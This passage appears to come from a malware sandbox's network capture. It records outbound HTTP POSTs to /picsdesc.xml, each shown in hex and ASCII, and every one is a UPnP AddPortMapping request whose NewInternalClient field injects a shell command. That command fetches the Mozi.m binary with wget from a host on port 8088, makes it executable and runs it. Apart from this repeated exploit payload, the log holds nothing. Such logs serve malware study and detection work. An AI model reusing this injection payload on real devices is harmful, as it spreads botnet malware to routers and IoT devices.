                                                                                                          SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                          Accept: /
                                                                                                          User-Agent: Hello-World
                                                                                                          Connection: keep-alive
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                          Jan 6, 2021 19:31:51.058692932 CET231OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                          Content-Length: 630
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                          Accept: /
                                                                                                          User-Agent: Hello-World
                                                                                                          Connection: keep-alive
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                          Jan 6, 2021 19:31:52.102754116 CET242OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                          Content-Length: 630
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                          Accept: /
                                                                                                          User-Agent: Hello-World
                                                                                                          Connection: keep-alive
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                          Jan 6, 2021 19:31:54.190845966 CET256OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                          Content-Length: 630
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                          Accept: /
                                                                                                          User-Agent: Hello-World
                                                                                                          Connection: keep-alive
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                          Jan 6, 2021 19:31:58.359076977 CET277OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                          Content-Length: 630
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                          Accept: /
                                                                                                          User-Agent: Hello-World
                                                                                                          Connection: keep-alive
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                          Jan 6, 2021 19:32:06.695486069 CET309OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                          Content-Length: 630
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                          Accept: /
                                                                                                          User-Agent: Hello-World
                                                                                                          Connection: keep-alive
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                          Jan 6, 2021 19:32:23.368266106 CET388OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                          Content-Length: 630
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                          Accept: /
                                                                                                          User-Agent: Hello-World
                                                                                                          Connection: keep-alive
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
